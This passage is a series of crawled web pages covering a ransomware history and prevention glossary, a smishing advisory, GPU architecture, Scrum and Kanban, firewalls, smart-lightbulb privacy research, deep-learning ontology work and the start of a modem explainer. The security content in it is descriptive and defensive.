move, DarkSide apologized for the disruptions caused by the attack, saying “We are apolitical. We do not participate in geopolitics. Our goal is to make money and not creating problems for society." Also known as DEV-0537, Lapsus$ is an international hacker group who gained notoriety for breaching prominent tech companies, including NVIDIA, Microsoft, Ubisoft, and Okta. The modus operandi of the Lapsus$ group hinges on acquiring credentials from privileged employees — either by recruitment or via social engineering. In the case of Okta, they targeted a third-party Technical Support Engineer who had access to some Okta systems. In other instances, the cybercriminal group has targeted help desks, resetting passwords and performing SIM swaps to bypass multi-factor authentication protocols. One of the group’s bolder tactics involves paying employees of large companies to run remote access tools or hand over credentials. Lapsus$ uses a channel on the messaging app Telegram to identify targets, share information, and ultimately recruit accomplices. WannaCry is a ransomware payload that was grafted onto a vulnerability discovered by the NSA and leaked by Shadow Brokers. The WannaCry ransomware crypto worm unleashed a worldwide attack in May 2017. Emergency patches by Microsoft, along with discovery of a kill switch, helped stop the spread within a few days. However, an estimated 200,000 computers across 150 countries were still affected, and damages ranging from hundreds of millions to billions of dollars. The hackers leveraged the vulnerabilities (nicknamed EternalBlue and DoublePulsar) and grafted WannaCry (real name WanaCrypt0r) as the payload. WannaCry does not need any user interaction to infect a host. The payload contains its own network scanner that can discover new hosts and self-propagate. Analysts have attributed this to the payload's ability to spread quickly, without anyone clicking on a link or browsing a malicious website. Like WannaCry, Petya attacks involved the exploitation of the EternalBlue vulnerability. Petya and its variants (such as NotPetya) proliferates through malicious Office attachments and email. Once the malware is installed, it seeks out other systems to exploit. On June 27, 2017, a number of Ukrainian companies received the brunt of Petya ransomware attacks. Power grids, nuclear facilities, and other key infrastructure companies were targeted. Radiation monitoring systems at Ukraine’s Chernobyl Nuclear Power Plant were knocked offline. The NotPetya variant has been dubbed the “most costly cyber-attack in history.” Damage spiraled into billions of dollars, affecting large businesses and governmental organizations worldwide. While not the first ransomware, CryptoLocker brought ransomware into the public eye. The CryptoLocker ransomware attack, perpetrated by the Gameover Zeus Botnet, occurred from September 2013 to May 2014, infecting more than 250,000 systems. CryptoLocker leveraged a trojan targeting Microsoft Windows computers and spread via infected spam email attachments. While CryptoLocker could be eliminated from systems easily, encrypted files were unable to be recovered even after the ransom payment was made. The top ransomware attacks typically leverage one or more of the following vectors to install themselves on computers and other devices: In recent years, RDP has been a top entry point, allowing ransomware operators to gain a foothold in an environment. RDP allows users—and thus, ransomware actors—to remotely control computers or virtual machines over a network connection. Users are contacted by criminals and persuaded to install software on their machines. Users open an email attachment that contains malware that is then installed on their machine. Macros in Microsoft Office and other apps can install ransomware. Certain downloaded software can have a hidden “payload” of ransomware. Mapped network drives allow the ransomware to spread to other machines. Certain websites can install malware when they are visited, especially if you have not patched your browsers or turned on proper browser security. This includes popup online ads. Root or administrative access can allow malware to spread quickly through your organization. Ransomware may use fileless malware techniques to stay hidden as it advances through the network. By applying the following ten best practices, individuals and organizations can reduce the risk of ransomware infection. Or at the very least, limit its spread and potential damage if an infection should occur. Train users in popular social engineering techniques. Inform them about the dangers of macros, Office documents, email attachments, and downloads, and give them techniques to identify these threats. Newer versions of MS Office have options to disallow any macros that are not digitally signed. Make sure you enable this option by default. Patch and Update Software and OS Vulnerabilities Some malware targets identified vulnerabilities. Ensure you have a thorough patching process that quickly identifies and fixes software and OS flaws. Apply Least Privilege Policies Least privilege requires assigning application and data access privileges based on job roles to ensure users do not have more access than they need. This includes removing administrator rights. Most ransomware (albeit not macro-based ransomware and some other forms, such as with WannaCry) requires administrator privileges to launch. Use Vulnerability Scanning and Patch Management Regularly scan your IT ecosystem for potential vulnerabilities and have a robust vulnerability management process to fix any issues. Enforce Stricter Application Controls Prevent installation or usage of applications unless they are vetted and approved by your IT security team. Protect Trusted Applications from Misuse Trusted Application Protection is a security capability that goes beyond simple application control. It involves adding context to the process tree and allowing the restriction of common attack chain tools, such as PowerShell and Wscript. These are spawned from commonly used applications, such as browsers or document handlers. Apply Network Segmentation Network segmentation divides resources in such a way so that an infection can be contained, rather than jumping throughout the entire network. This is particularly useful in preventing and isolating dangerous server-side ransomware attacks. Make Regular Backups If you are impacted by a ransomware infection, you will need to recover applications and data. Have a robust data backup process in place that combines live mirroring, periodic backups, hard drive imaging, and incremental backups. Have Disaster Recovery Processes If you are impacted, it is vital everyone understands what they need to do. Develop a working disaster recovery process for identifying and resolving ransomware attacks, reinstalling machines, and recovering data. Cyber insurance (also referred to as cyber liability insurance or data breach insurance) provides insurance coverage for events including data breaches, downtimes, and ransomware attacks. In the event of a ransomware attack, cyber insurance policies are designed to offset damages. Actual offerings and coverage will vary depending on the policy issuer. A rash of successful ransomware attacks over the past couple years has roiled the cyber insurance marketing. Cyber insurance premiums spiked to record highs in 2021. The large number of ransomware attacks, combined with skyrocketing payouts has even put some cyber insurers out of business altogether. According to the Council of Insurance Agents & Brokers, the average premium for cyber insurance coverage increased 27.6% during Q3 2021. This was in addition to an increase of 25% in the previous quarter. As a result, brokerages and underwriters are demanding stricter cybersecurity postures from their policyholders to qualify for coverage. Many organizations are now struggling to qualify for cyber insurance due to the higher scrutiny insurers are placing on potential and existing policy holders. Your risk of falling victim to a ransomware attack will depend on how closely your organization adheres to prevention best practices. Unfortunately, threat actors are continuously adapting their attack strategies to overcome even the most advanced defense measures. If the worst does happen and your organization is subjected to a ransomware attack, here is what to do. Implement Your Disaster Recovery Program Limit the further spread of the ransomware and start your disaster recovery process. Wipe and Reinstall Machines Close any impacted machines, wipe them, and reinstall the OS and applications. Recover Uncompromised Data Use backup data from your last known “good” data set. Apply a “Lessons Learned” Approach Revise security procedures and staff training to stop these issues from happening again. Identify Security Gaps to Brace for the Future Take measures to develop new organizational policies and deploy new solutions to increase your organization's cyber defenses.
<urn:uuid:0affc1b3-115d-4ec7-b24e-0605ef40ac9e>
CC-MAIN-2022-40
https://www.beyondtrust.com/resources/glossary/ransomware
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00252.warc.gz
en
0.931585
2,537
2.9375
3
Cyberattacks via SMS messaging are on the rise, and are having such an impact, the Federal Communications Commission has released an advisory on Robotext phishing attacks (or smishing). According to Verizon’s 2022 Mobile Threat Index, 45% of organizations have suffered a mobile compromise in 2022 – that’s double the % of orgs in 2021. If you’re wondering if it’s purely a shift in tactics on the cybercriminal's part, think again. According to Verizon: - 58% of orgs have more users using mobile devices than the prior 12 months - Mobile users in 59% of orgs are doing more today with their mobile device than the prior 12 months - Users using mobile devices in 53% of orgs have access to more sensitive data than a year ago And keep in mind that while there are plenty of security solutions designed to secure mobile endpoints, we’re talking about personal devices that are used as a mix of corporate and personal life. This makes for a very unprotected target by cybercriminals. So, it shouldn’t come to any surprise that the FCC has put out an advisory warning about the increased use of robotexting-based phishing scams targeting mobile users, commonly called 'smishing'. Some of their warning signs include: - Unknown numbers - Misleading information - Misspellings to avoid blocking/filtering tools - 10-digit or longer phone numbers - Mysterious links - Sales pitches - Incomplete information We’ve seen smishing scams impersonating T-Mobile, major airlines, and even the U.K. Government. So consumers and corporate users alike need to be aware of the dangers of text-based phishing attacks – something reinforced through continual Security Awareness Training.
<urn:uuid:326f4ce8-8e0e-4d43-af48-c620628cdc82>
CC-MAIN-2022-40
https://blog.knowbe4.com/u.s.-government-warns-of-increased-texting-scams-as-mobile-attacks-are-up-100
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00452.warc.gz
en
0.917319
372
2.625
3
A Graphics Processor Unit (GPU) is mostly known for the hardware device used when running applications that weigh heavy on graphics, i.e. 3D modeling software or VDI infrastructures. In the consumer market, a GPU is mostly used to accelerate gaming graphics. Today, GPGPU’s (General Purpose GPU) are the choice of hardware to accelerate computational workloads in modern High Performance Computing (HPC) landscapes. HPC in itself is the platform serving workloads like Machine Learning (ML), Deep Learning (DL), and Artificial Intelligence (AI). Using a GPGPU is not only about ML computations that require image recognition anymore. Calculations on tabular data is also a common exercise in i.e. healthcare, insurance and financial industry verticals. But why do we need a GPU for these types of all these workloads? This blogpost will go into the GPU architecture and why they are a good fit for HPC workloads running on vSphere ESXi. Latency vs Throughput Let’s first take a look at the main differences between a Central Processing Unit (CPU) and a GPU. A common CPU is optimized to be as quick as possible to finish a task at a as low as possible latency, while keeping the ability to quickly switch between operations. It’s nature is all about processing tasks in a serialized way. A GPU is all about throughput optimization, allowing to push as many as possible tasks through is internals at once. It does so by being able to parallel process a task. The following exemplary diagram shows the ‘core’ count of a CPU and GPU. It emphasizes that the main contrast between both is that a GPU has a lot more cores to process a task. Differences and Similarities However, it is not only about the number of cores. And when we speak of cores in a NVIDIA GPU, we refer to CUDA cores that consists of ALU’s (Arithmetic Logic Unit). Terminology may vary between vendors. Looking at the overall architecture of a CPU and GPU, we can see a lot of similarities between the two. Both use the memory constructs of cache layers, memory controller and global memory. A high-level overview of modern CPU architectures indicates it is all about low latency memory access by using significant cache memory layers. Let’s first take a look at a diagram that shows an generic, memory focussed, modern CPU package (note: the precise lay-out strongly depends on vendor/model). A single CPU package consists of cores that contains separate data and instruction layer-1 caches, supported by the layer-2 cache. The layer-3 cache, or last level cache, is shared across multiple cores. If data is not residing in the cache layers, it will fetch the data from the global DDR-4 memory. The numbers of cores per CPU can go up to 28 or 32 that run up to 2.5 GHz or 3.8 GHz with Turbo mode, depending on make and model. Caches sizes range up to 2MB L2 cache per core. Exploring the GPU Architecture If we inspect the high-level architecture overview of a GPU (again, strongly depended on make/model), it looks like the nature of a GPU is all about putting available cores to work and it’s less focussed on low latency cache memory access. A single GPU device consists of multiple Processor Clusters (PC) that contain multiple Streaming Multiprocessors (SM). Each SM accommodates a layer-1 instruction cache layer with its associated cores. Typically, one SM uses a dedicated layer-1 cache and a shared layer-2 cache before pulling data from global GDDR-5 memory. Its architecture is tolerant of memory latency. Compared to a CPU, a GPU works with fewer, and relatively small, memory cache layers. Reason being is that a GPU has more transistors dedicated to computation meaning it cares less how long it takes the retrieve data from memory. The potential memory access ‘latency’ is masked as long as the GPU has enough computations at hand, keeping it busy. A GPU is optimized for data parallel throughput computations. Looking at the numbers of cores it quickly shows you the possibilities on parallelism that is it is capable of. When examining the current NVIDIA flagship offering, the Tesla V100, one device contains 80 SM’s, each containing 64 cores making a total of 5120 cores! Tasks aren’t scheduled to individual cores, but to processor clusters and SM’s. That’s how it’s able to process in parallel. Now combine this powerful hardware device with a programming framework so applications can fully utilize the computing power of a GPU. ESXi support for GPU VMware vSphere ESXi supports the usage of GPU’s. You will be able do dedicate a GPU device to a VM using DirectPath I/O, or assign a partitioned vGPU to a VM using the co-developed NVIDIA GRID technology or using 3rd party tooling like BitFusion. To fully understand how GPU’s are supported in vSphere ESXi and how to configure them, please review the following blog series: - Using GPUs with Virtual Machines on vSphere – Part 1: Overview - Using GPUs with Virtual Machines on vSphere – Part 2: VMDirectPath I/O - Using GPUs with Virtual Machines on vSphere – Part 3: Installing the NVIDIA GRID Technology - Using GPUs with Virtual Machines on vSphere – Part 4: Working with BitFusion FlexDirect High Performance Computing (HPC) is the use of parallel processing for running advanced application programs efficiently, reliably and quickly. This is exactly why GPU’s are a perfect fit for HPC workloads. Workloads can greatly benefit from using GPU’s as it enables them to have massive increases in throughput. A HPC platform using GPU’s will become much more versatile, flexible and efficient when running it on top of the VMware vSphere ESXi hypervisor. It allows for GPU-based workloads to allocate GPU resources in a very flexible and dynamic way.
<urn:uuid:4858c422-5545-4e85-9146-876a3dac9718>
CC-MAIN-2022-40
https://nielshagoort.com/2019/03/12/exploring-the-gpu-architecture/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00452.warc.gz
en
0.913551
1,274
3.484375
3
Companies must be agile. Companies must deliver digital services quickly; they must align with customers’ every-changing needs. Lean startups are all the rage in the age of VUCA. Pivoting in response to consumer trends can no longer wait for monolithic and bureaucratic change procedures. Practitioners in the tech field have prioritized two approaches, Scrum and Kanban, in pursuit of this agility. Let’s look at the main differences between Scrum and Kanban. Note that they are not in opposition—it’s not one or the other. In fact, you may get the most benefit when using them in tandem. The way Scrum and Kanban originated highlights their differences. Scrum originated with a January 1986 HBR paper, The New New Product Development Game, written by Hirotaka Takeuchi and Ikujiro Nonaka. The main premise was to move away from a sequential approach to new product development. Instead, developers should embrace a holistic, fast, flexible process. (Takeuchi and Nonaka borrowed from the game of rugby, hence the name Scrum.) Ken Schwaber and Jeff Sutherland embraced these ideas, presenting Scrum and its applicability to software development at the 1995 Object-Oriented Programming, Systems, Languages & Applications (OOPSLA) conference. In 2001, Schwaber and Sutherland participated in the famous ski resort meeting where the Agile Manifesto was crafted. The two later authored the Scrum Guide, in 2010, which is recognized today as the official Scrum Body of Knowledge. Kanban originates decades earlier, when Japanese shop owners used sign boards in crowded streets to advertise their wares and differentiate them from competitors. The name Kanban comes from two Japanese names, Kan meaning ‘sign’ and Ban meaning a ‘board’. In 1956, a young Toyota industrial engineer Taiichi Ohno created a system that used paper cards for signaling and tracking demand in his factory, naming the new system Kanban. Benefits including reduced stockpiles, improved throughput, and provided high visibility into the process propelled this approach to success. The system was incorporated into the entire organization in 1963 and became part of the Toyota Production System. In 2004, David J. Anderson was the first to apply Kanban to IT, software development, and knowledge work. People use the Scrum framework to address complex adaptive problems, while productively and creatively delivering products of the highest possible value. Scrum is founded on empirical process control theory, which asserts that knowledge comes from experience and making decisions based on what is known. Three pillars uphold this approach: - Transparency. Significant aspects of the process must be visible for those involved in the outcomes. - Inspection. Those involved must frequently inspect the artifacts and progress towards the goal. - Adaptation. If any aspect of the artifacts or progress is unsatisfactory, adjustments must be made as soon as possible. Kanban is a way to improve flow and provoke system improvement through visualization and controlling work in progress. It has four foundational principles: - Start with what you do now. - Agree to pursue evolutionary change. - Initially, respect current roles, responsibilities, and job titles. - Encourage acts of leadership at all levels. Scrum denotes five time-based events for managing product delivery iteratively and incrementally, while maximizing opportunities for feedback. These are: - Sprint Planning. An eight-hour session where the team decides what to deliver in the coming sprint (from the product backlog) and how to go about it. - Sprint. A timeframe of a month or less where the team delivers what was agreed in the sprint planning session. - Daily Scrum. A 15-minute timebox (commonly referred to as daily stand up) where the team meets daily during the sprint to inspect progress and identify blockers. - Sprint Review. A four-hour timebox event held at the end of the sprint. The team demonstrates the product/changes to customers and gathers feedback on what to incorporate in the product backlog for delivery in subsequent sprints. - Sprint Retrospective. A three-hour timebox event held after the sprint review (and before the next sprint planning). The team reviews their work, identifying opportunities for improvement work processes in subsequent sprints. Scrum framework (Source) Kanban has six core practices: - Visualize the Flow of Work. Use cards or software to visualize the process activities on swim lanes. - Limit Work in Progress (WIP). Encourage your team to complete work at hand first before taking up new work. The team pulls in new work only when they have capacity to handle it. - Manage Flow. Observe the work as it flows through the swim lanes. Address any bottlenecks. - Make Process Policies Explicit. Visually diagram the process rules and guidelines for managing the flow of work. - Implement Feedback Loops. Throughout the work process, incorporate regular reviews with the team and customers to gather and incorporate feedback. - Improve Collaboratively, Evolve Experimentally. As a team, look for and incorporate improvement initiatives, including through safe-to-fail experiments. Kanban Board (Source) Scrum defines three main roles: - Product Owner. The sole person responsible for managing the Product Backlog. - Scrum Master. A servant leader responsible for helping the team understand Scrum theory, practices, rules, and values. - Development Team. Self-organizing group of 3-9 professionals responsible for delivering the products. Kanban has no set roles. However, David Anderson advocates for two roles: - Service Delivery Manager (SDM). The person who ensures work items flow and facilitates change and continuous improvement activities. - Service Request Manager (SRM). The person who orders and prioritizes work items and improves corporate governance with the process. In Scrum, the main production metric is velocity. This describes the rate of progress of what the team is delivering, based on the estimation carried out during sprint planning. The scrum team uses velocity as an indicator of how much they are delivering the items in the product backlog at each sprint, based on the effort required. Kanban uses two main metrics: - Cycle time measures how much time a task spends going through the process (i.e. how long a card stays within the WIP swim lanes). - Throughput measures the total amount of work delivered in a certain time period (i.e. number of cards delivered in each time period on a specific Kanban board). Using Scrum and Kanban together Scrum and Kanban can be used together, both in development environments and IT service management. In fact, the Scrumban framework has emerged. Scrumban leverages both frameworks to better embrace agility and to improve what is lacking in each. Using both frameworks provides many benefits, particularly from a people perspective: fostering collaboration and improvement through feedback and focusing attention on delivering business value. To learn more about Agile and software development, check out these BMC Blogs: - Intro to Agile with Scrum: 4 Tips for Getting Started - Agile Roles and Responsibilities - Customer User Feedback: The Keystone of the Agile Approach - The Software Development Lifecycle (SDLC): An Introduction - DevOps Feedback Loops: An Introduction
<urn:uuid:b02a946a-ce72-4e2d-817b-b6409df5efdb>
CC-MAIN-2022-40
https://www.bmc.com/blogs/scrum-vs-kanban/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00452.warc.gz
en
0.915412
1,548
2.5625
3
Firewalls are software or firmware that enforce policies about what information packets will be permitted to enter or leave a system. Firewalls are arranged across hardware devices to channel traffic and lower the risk of malicious packets traveling from the public web into a closed or private environment. Firewalls may also take the form of standalone software. The term firewall is a metaphor that describes a kind of physical obstruction used in buildings. Physical firewalls are erected to limit the harm a fire can cause as it travels from one building towards others. In information technology, firewalls are a virtual barrier that is set up to restrict the potential internal harm from an externally sourced cyberattack. Low-level firewalls are sometimes placed on the external perimeter of a system to inspect traffic, and as they range in severity firewalls can serve as active filters of traffic traveling in both directions. Firewalls can also be set up to protect cloud applications as many enterprises are migrating their resources to hosted or hybrid environments. "Do you have one or more links in the email that you're having difficulty sending me? If so, our firewall is preventing your email from getting to me. Your email is out of our domain and the links are flagged because we receive many malware attempts."
<urn:uuid:93c5151c-bf2b-404e-bd9c-0e49c42046e8>
CC-MAIN-2022-40
https://www.hypr.com/security-encyclopedia/firewall
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00452.warc.gz
en
0.953788
261
3.515625
4
Infrared channels could help attackers steal data and even reconstruct video images, say US researchers. Smart lighting products have soared in popularity in recent years. A common feature of most of them is the ability to control lights remotely via Wi-Fi, Bluetooth, or other networks. Most systems are LED based, but some are also equipped with infrared capabilities to aid surveillance cameras in smart homes and offices. But while smart lighting systems offer many environmental and energy minimisation benefits – as well as the ability to customise settings to suit users’ moods – most are connected to home or office networks – either directly or via a communication hub – and can be controlled by users’ mobile devices. As a result, smart lights are “poised to become a much more attractive target for security/privacy attacks than before”, according to new research published in the US. Researchers from the University of Texas have discovered that some smart lightbulbs could be compromised by hackers to infer users’ preferences and steal private data – even if the systems have been secured against attack via the internet. The researchers tested two of the most popular smart lighting systems from LIFX and Phillips Hue and found that the bulbs created new potential avenues of attack for hackers and other malicious actors. “These connected lights create a new attack surface, which can be maliciously used to violate users’ privacy and security,” says the research. The findings reveal that three new types of attack are possible, using the optical properties of the lights themselves, rather than their IP connectivity. “The first two attacks are designed to infer users’ audio and video playback [choices] by a systematic observation and analysis of the multimedia visualisation functionality of smart lightbulbs,” says the report. Anindya Maiti and Murtuza Jadliwala from the University of Texas at San Antonio looked at how smart bulbs receive commands for changing the brightness and colour of bulbs when music or videos are playing. The researchers found that hackers could create or acquire a database of patterns that correspond to songs and videos and use this as a reference to build a profile of the victim’s likes and preferences. In other words, hackers could determine which songs and videos the user is playing, merely by analysing the changing light intensities and colours of the smart lights. While such an attack might seem unlikely, it could have significant privacy implications for smart light users. For instance, the US Video Privacy Protection Act (1988) was enacted to prevent abuse of users’ media consumption information, which can potentially reveal fine-grained personal interests and preferences. The third attack type is more serious, suggests the report, and uses the infrared capabilities of smart light bulbs to create a covert communication channel, which could be used as a gateway to exfiltrate users’ private data out of their secured home or office network. “With the help of a malicious agent on the user’s smartphone or computer, the adversary can encode private information residing on these [smart home] devices and then later transmit it over the infrared covert-channel residing on the smart light,” says the report. “Moreover, as several popular brands of smart lights do not require any form of authorisation for controlling lights (infrared or otherwise) on the local network, any application installed on the target user’s smartphone or computer can safely act as the malicious data exfiltration agent.” Exfiltration of data is possible using transmission techniques such as amplitude and/or wavelength shift keying, using both the visible and the infrared spectrum of the smart bulbs. Additional reporting: Rene Millman. Internet of Business says Researchers said that the threats detailed in the paper could be mitigated by enforcing strong network rules, so that computers and smartphones cannot control smart lightbulbs over an IP network. However, such rules could, of course, harm the utility of the system, they said. Users could also do something almost unheard of in the always-on, selfie-focused world: simply draw the curtains. The detailed research findings are available here.
<urn:uuid:68766894-62f9-4a73-93ce-610b256cd918>
CC-MAIN-2022-40
https://internetofbusiness.com/smart-lightbulbs-can-be-used-to-steal-private-data-says-us-report/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00452.warc.gz
en
0.929615
857
2.875
3
Deep Learning and Ontology Development Ontologies are widely used for representing and reasoning about semantic content in a structured way. However, manual ontology construction is a subtle and time-consuming process that often yields mixed results. Hand-crafted ontologies tend to be inflexible and inordinately complex, which limits their usefulness and makes cross-domain alignment painfully difficult. Practitioners are faced with several daunting challenges, including efficient generation of robust type systems, multi-modal fusion, and improvements to the semantic quality and concision of knowledge graphs while preserving their logical structure. Recent advances in machine learning, particularly involving deep neural networks, have the potential to help mitigate these issues with ontology development and alignment while enhancing and automating aspects of implementation and expansion. We at GA-CCRi have done a lot of work in some of these areas, especially: - Knowledge discovery, federated search, and SPARQL queries - Data fusion, mapping, alignment, and aggregation - Natural Language Processing (NLP) alignment Project features that we have implemented in these areas have included: - Alignment within a semantic vector space of diverse data modalities, including text, imagery, and Resource Description Format (RDF) triples, using mapping transformations between domains - Scalable semantic indexing and discovery in the fused data space, including geospatial and SPARQL query capabilities - Customization of deep learning content models for text, overhead imagery, and full-motion video - Detection of inconsistencies and anomalies across data sources - Automatic suggestions for missing metadata values - Extraction, disambiguation, and resolution of types, topics, and named entities from unstructured text Let’s take a closer look at some of this work. Deep Content Models In the past decade, deep learning has generated much excitement in the machine learning community and beyond. Compared with older models that require more manual intervention and produce inferior results, deep neural networks now boast state-of-the-art performance in a wide variety of fields, including image recognition, natural language processing, machine translation, knowledge base completion, and reinforcement learning. Many deep learning algorithms are fundamentally feature learning algorithms that represent data within multi-dimensional vector spaces, also known as embedding spaces. For example, convolutional neural networks learn high-level features that encode the content of images, while word2vec (developed at Google but publicly available) learns compact vectors that encapsulate the distributional meanings of words. These representations enable robust data fusion across domains and support downstream modeling, which facilitates the expansion and alignment of existing ontologies. The foundation of our modeling approach is to produce high-quality data representations that are directly derived from the content without requiring extensive manual engineering of features. The advantages are twofold: the models capture the rich semantics of the data within each domain or modality, and they also also produce compact encodings that are amenable to fusion and additional modeling. Over the past several years, GA-CCRi has researched and developed a variety of novel software solutions for several customers. As a part of these efforts, we have applied convolutional neural networks (CNNs) to both text and overhead imagery. CNNs are well-known for their ability to successfully learn features across multiple layers of increasing abstraction, and they are currently the state-of-the-art models for several machine learning tasks, especially scene understanding and speech recognition. More recently, GA-CCRi has also done work for one customer involving caption generation for full-motion video. Following the latest results in the scientific literature, our approach applies a CNN to each frame of the video, incorporating information about the optical flow, and then feeds the representation to a long short-term memory (LSTM) recurrent neural network. The LSTM takes sequential data as input and generates responses by combining the most recent input with long-range history, producing sentence captions for video. Embedding models seek to address the challenge of disparate (big) data directly by using a deep learning process to leverage all inputs into a single learned numeric signature per entity. This learning step has the benefit of both compressing potentially large, raw inputs to a fixed size for use in bandwidth-constrained environments as well as making diverse input data equally accessible to the full gamut of conventional machine learning techniques. Embedding spaces are also amenable to modeling explicit transformations between them. This approach provides a powerful tool for domain transfer and data fusion. Examples of such mappings include: - Fusion of disparate text sources - Fusion of disparate knowledge graphs - Fusion of overhead imagery with structured geospatial data - Fusion of full-motion video with text - Machine translation between languages The ontology alignment problem can also be viewed through the lens of machine translation. Given a small amount of training data, it is possible to learn mappings between different ontologies or map them into a shared semantic space. By using the automatically-generated ontology as the target space, we can expand and merge manually-crafted ontologies while taking advantage of predefined structures. This process also enables detection of inconsistencies and anomalies among the various schema. GA-CCRi has leveraged this neural network fusion technology for two recent projects. For one of these, we have prototyped a system that learns representation vectors for entities in a large knowledge graph to enable fusion so that a data model can be maintained efficiently across distributed cloud nodes. Our approach to enabling this is to learn content vectors for each entity using a multitask learning approach. The core model to this approach learns from RDF statements: subject-predicate-object triples about entities in a large database. The model learns by first assigning a randomly initialized content vector to each entity and predicate and then using the TransE model to predict whether each statement is actually a true statement in the knowledge base or not. Fusion of the learned knowledge across the machines is done only at the model level: model weight updates are shared between the two machines, but none of the training data is shared. The cost of sharing the model weights is insignificant relative to sharing of the raw data. The other neural network fusion project leverages multi-modal datasets provided by the customer. Within this project, GA-CCRi developed the capability to address both the scalability and distribution of image processing on large remote sensing data sets. A portion of this effort focused on the exploitation of overhead imagery for data fusion. Originally, this framework was born out of the need to extract image-specific information content in support of a larger data fusion effort. The targeted fusion effort aimed to leverage embedding models to relate disparate data sources (for example, imagery, text, geographic, and temporal sensor data) in the face of expanding data volumes. Knowledge Discovery and Federated Search Fused embedding spaces are also useful for answering questions that are directly relevant to analysts and domain experts. GA-CCRi has developed scalable search tools over embedding spaces for various modalities supporting free text, geospatial, and SPARQL queries, among others. We can also provide supporting feedback evidence to the user in order to increase their confidence in the model. For example, if a document is returned that contains no terms matching the query, the model automatically displays the closest semantic matches between important terms in the document and the query. GA-CCRi’s Large Scale Semantic Discovery with Neural Content Models project addresses problems associated with manual content curation for information retrieval: inconsistencies in tag assignment, inaccurate tagging, scalability problems, and federated search across fused data sets. By replacing this manual metadata assignment with the use of deep neural networks that analyze both content and metadata and represent their semantics using embedded vector models, the system can perform tasks such as part-of-speech tagging, word-sense disambiguation, and entity extraction. The use of CNNs adds the ability to automatically generate such metadata from images, and the use of embedding vectors for this metadata means that metadata from images, text, and other media can be combined for easier cross-media research. To further improve the metadata used to drive analyst information retrieval, these techniques enable the inference of missing metadata values, the identification of anomalous tags, and the extraction and categorization of named entities from text as additional metadata. The implementation of the system on cloud-based servers provides scalability of storage and processing to go with the greater scalability of automated metadata assignment over manual metadata assignment. Natural Language Processing and Mapping A distinguishing feature of semantic vector spaces is the ability to automate the grouping together of entities by similarity in a continuous way and the modeling of various relations as transformations of the underlying space. In particular, the nearest-neighbor relation provides a latent encoding of various subtle and fine-grained attributes. For example, the vector for Putin lies near the vectors for related entities such as Russia, Moscow, and Kremlin. Moreover, simple algebraic operations on the vector space can be used to complete analogies to some extent. For example, the difference between the vectors for Russia and Putin is similar to the difference between the vectors for Syria and Assad. These processes can be used to uncover unexpected and surprising correlations that are not explicitly contained in the source data such as latent power structures within organizations. For semantic representations of text and graph, GA-CCRi has implemented a version of Google’s well-known SkipGram algorithm. This model enables us to represent the meanings of words, as well as nodes in a graph—for example, documents linked to metadata, or RDF data derived from geospatial sources. Embedding vectors are also convenient for training additional supervised models, e.g. in order to rank anomalous entities relative to a given criterion or to suggest a value for a missing item along with a confidence score. GA-CCRi has developed such capabilities, including knowledge base augmentation, metadata suggestion, and entity categorization. In recent work, GA-CCRi has also been developing a capability for automated creation of latent type systems using embeddings, geared toward text-mining tasks such as topic extraction, type inference, and entity disambiguation and resolution. In particular, we are able to suggest new classes to extend an ontology based on new data. Ontologies generated by neural language models have the advantage of containing both discrete and continuous representations, which allows them to efficiently encode semantic signatures of entities and relationships in a way that can feed downstream logical processes. The image above shows an automatic type clustering of words. Each cluster centroid is labeled with the closest word in embedding space. At this high level, we apparently see the separation of nouns, verbs, adjectives, and proper nouns, along with some finer topical distinctions. By repeating this process with higher-resolution clusterings, we obtain a latent hierarchy of subtypes such as the way the set of proper nouns contains the set of location names, which in turn contains names of countries and cities, and so forth. This same technique will be very useful in automated ontology generation. In order to fully exploit the information in this hierarchy, it is critical to disambiguate terms according to the contexts in which they occur. For example, the image below shows disambiguation of mentions of the term Jordan across documents. Note that the model is able to distinguish different broad entities (for example, Jordan the basketball player vs. Jordan the country) but also different topical usages of the same entity such as political vs. economic mentions of the country Jordan. This ability to generate ontologies is a good example of how GA-CCRi often applies different kinds of neural networks to work together to solve a larger problem. In this case, the data fusion, knowledge discovery, federated search, natural language processing, and disambiguation abilities can all work together to create an ontology that is more than just labeled clusters of similar words. These techniques draw on latent semantics of the terms in a document collection to create a more meaningful ontology that can help users navigate that collections better and get more value from those documents.
<urn:uuid:6ec988ab-0859-475c-8671-a32fcb263372>
CC-MAIN-2022-40
https://www.ga-ccri.com/deep-learning-ontology-development
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00452.warc.gz
en
0.914607
2,489
2.796875
3
These days, we completely depend on the Internet rather than merely using it. Our entire day could be wrecked by a delayed or, worse, nonexistent connection. However, have you ever paused to consider how this connection functions? Your modem acts as a translator between the many digital languages that your home network’s components, such as the Wi-Fi router and mobile devices, speak. It converts the signals that are sent by your Internet Service Provider, or ISP, into an Internet connection so that your Wi-Fi router may transmit them. Your modem provides you with basic Internet connectivity, but it can also significantly impact how effectively your home Wi-Fi operates. What is the difference between a router and a modem? If you have been using the Internet for some time, you have probably heard the terms “modem” and “router” used, but you may not have given them much thought. Don’t worry as we are prepared to assist you. Simply put, your router establishes a network among the computers in your home, and your modem links those computers to the internet. Your router, which directs traffic between the internet and your computer, is what you really connect to when you use Wi-Fi. Many internet service providers like Optimum give you the chance to rent both a router and a modem for your convenience. Optimum in particular also offers a smart router that guarantees greater efficiency. Click on this link and bring home the most efficient smart router. Now that you are aware of the difference between a modem and a router, let us move forward and elaborate on the uses of a modem. Use of a Modem for an Internet Connection As you may already be aware, a modem is typical network equipment that establishes a connection between a computer and the Internet. However, there are various types of modems on the market, and you may be curious as to how they differ. We hope that after reading this article you will have a better grasp of DSL, cable, and dial-up modems. - DSL Modem Your computer can be connected to the Internet via a DSL connection using a DSL modem, which is a network device. These days, it is quite normal to find routers with a built-in DSL 